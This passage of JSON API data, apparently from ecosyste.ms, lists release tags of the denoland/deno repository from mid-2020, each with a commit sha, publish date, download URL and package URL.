eno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/host